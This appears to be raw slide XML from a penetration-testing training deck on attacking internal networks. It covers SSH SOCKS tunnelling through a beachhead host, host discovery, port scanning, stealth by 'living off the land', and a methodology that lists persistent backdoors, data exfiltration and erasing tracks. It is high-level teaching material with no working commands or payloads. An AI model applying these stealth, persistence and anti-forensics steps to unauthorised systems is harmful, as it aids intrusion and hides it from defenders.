              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Base methodology of attacking internal network hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Considerations when performing internal testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Methods/Key Services to perform internal testing and securely establishing your internal access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Next steps explained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Next: Privilege Escalation Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1520363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4B6B8-B5E7-4608-904D-861CD282EC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A46356FE-B646-48F2-A3B3-76CCA12E11FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Purpose of Internal Network Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Internal Network Penetration Testing Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Key Considerations of Internal Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Exposing the Internal Network/Secondary Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Defensive SSH Measures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Host Discovery Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Port Scanning (Internal Network)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Enumerating firewalled services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="747543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8C7BCF2-9254-495D-8120-F4C32A172F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A300F88-100F-497A-94AF-634DA690BC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FF989CC-A02B-4B8A-946E-E477291629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F3460194-35A9-4C0D-BB74-CA8B24E0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C31FCA4-2862-4AAF-8345-EF05E4E34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6D40B2E4-0C94-4F89-B149-F9B0AB7A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B16AFCB-50B7-4346-ABC6-3A8C5D02D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8356DF69-976D-4483-99D0-DBBD1C054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5DDB3B9F-0EE7-417C-A3F1-D8F2F2C6F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2CDDF67-D03A-4E88-8BF9-0B44B61A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AA7EFCE-40F3-4772-874E-436BE0FA0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5B1E0373-E99D-4E73-B38A-8B7C58BED155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="609600"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Internal Network Penetration Testing Methodology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BB8C059-2F0B-4D80-BDB1-460CCE8262C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Establish SOCKS Tunnel/Secondary SSH Reverse Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Perform Host Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Port Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Firewalking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Probing/Enumeration of Internal Services (Username dumps, Vulnerable Versions, Credentials, IPv6 access) – Privilege Escalation more-like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Defence Evasion (Firewalls, Restricted Shells, VLANs.) – Separate talk(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Privilege Escalation (If identified opportunity) – Separate talk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Post-Exploitation (Persistent backdoors, Data exfiltration)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Erasing Tracks (Anti-Forensics)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14364023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8C7BCF2-9254-495D-8120-F4C32A172F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A300F88-100F-497A-94AF-634DA690BC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FF989CC-A02B-4B8A-946E-E477291629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F3460194-35A9-4C0D-BB74-CA8B24E0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C31FCA4-2862-4AAF-8345-EF05E4E34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6D40B2E4-0C94-4F89-B149-F9B0AB7A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B16AFCB-50B7-4346-ABC6-3A8C5D02D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8356DF69-976D-4483-99D0-DBBD1C054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5DDB3B9F-0EE7-417C-A3F1-D8F2F2C6F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2CDDF67-D03A-4E88-8BF9-0B44B61A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AA7EFCE-40F3-4772-874E-436BE0FA0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5321817-3AE0-49D7-8A03-B31705E87606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="609600"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Purpose and Context of Internal Network Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26017B89-92AD-4534-ABBC-3BC1465FB976}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Testing of internal network security defences and server configurations (Firewall, IDS/IPS, VLANs, Access Rules)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An attacker has gained user access to an account and is attempting to escalate privileges.</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An existing user with credentials is an insider threat attempting to infiltrate unauthorised areas of the network.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25855792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C16C40-7C29-4ACC-B851-7E08E459B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8C7BCF2-9254-495D-8120-F4C32A172F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A300F88-100F-497A-94AF-634DA690BC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FF989CC-A02B-4B8A-946E-E477291629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F3460194-35A9-4C0D-BB74-CA8B24E06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C31FCA4-2862-4AAF-8345-EF05E4E34E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6D40B2E4-0C94-4F89-B149-F9B0AB7A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DB16AFCB-50B7-4346-ABC6-3A8C5D02D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8356DF69-976D-4483-99D0-DBBD1C0544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5DDB3B9F-0EE7-417C-A3F1-D8F2F2C6F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A2CDDF67-D03A-4E88-8BF9-0B44B61A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8AA7EFCE-40F3-4772-874E-436BE0FA0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5BF2B39-11E0-42D5-AAF6-D321B6E6CEF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="609600"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Key Considerations Against Secure Networks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{838644B5-4987-4D05-83D5-DF9593F17959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stealth is vital - </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tread lightly – Your beachhead machine to internal network serves a purpose to the network, take all measures to ensure it does not break!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ensure to LOTL (Live Off The Land) – Use target binaries, craft custom tools to decrease risk of detection, never rely on off-the-shelf tools in case of their absence in the target environment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21547767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D15C7-711A-4076-BD2A-AF5F074E5F51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Establish SOCKS Tunnel  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Connecting To The Internal Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30D1A9BE-8DCA-4E96-9B3F-3D7F1BB2EFFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Using the initial access machine as a proxy server with Proxychains. Exposing the internal network using SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>dynamic port forwarding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">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This method of access allows the use of external tools/binaries (NMAP, nc/ncat) hosted on your attacking machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">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Communication with internal services using their DNS hostname and accessing browser services such as internal websites, SOCKS proxies can be integrated with HTTP proxies to allow for website request interception.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139321211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F84F9-B13F-4638-A9C2-B63BA11B45A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Diagram of SSH SOCKS Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B32029C-F196-4269-BC9B-ECE125FD9D55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="3846" r="13918"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396577" y="1270000"/>
            <a:ext cx="7312622" cy="4778375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4016878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6502-4BCE-40C6-B2D5-0C9D3D47CDA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Configuring SOCKS on Firefox</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B18645C3-B684-4C95-8EFC-D35C0656B7CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="12500"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2624989" y="1270000"/>
            <a:ext cx="5467465" cy="5267325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{381159EC-BC57-44AF-88DD-7D94A0CC9746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824182" y="2135909"/>
            <a:ext cx="934186" cy="187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03B74A0-3A4C-4B5A-A28D-3B46AFA2BBE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824182" y="2135909"/>
            <a:ext cx="1715972" cy="1353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3DB7E2C-31BE-46FE-93B6-253F1443463F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824182" y="2135909"/>
            <a:ext cx="5767855" cy="1421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CE3339-78B9-4AF0-91E3-84790AF8037D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824182" y="2135909"/>
            <a:ext cx="857986" cy="3946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8A393E-7BAA-4A73-AE97-B49E7619EDB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8075063" y="3028155"/>
            <a:ext cx="1464629" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Port number of SOCKS from SSH -D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5FCBD6-F59F-4A33-BB9A-AF2E6F93AD00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4904292" y="3662133"/>
            <a:ext cx="1464629" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SOCKS v5 supports TCP/UDP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC2D053A-9BAC-41EB-BCB1-E978DE64714A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918976" y="5620353"/>
            <a:ext cx="1810412" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Resolve hostnames of internal hosts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABCB656B-B70E-4660-9492-18A41A6D9A98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100668" y="1786855"/>
            <a:ext cx="1647314" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Key points of SOCKS configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C723F4DB-9EA0-4975-87DD-375086E27FF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3627287" y="3008768"/>
            <a:ext cx="2088859" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
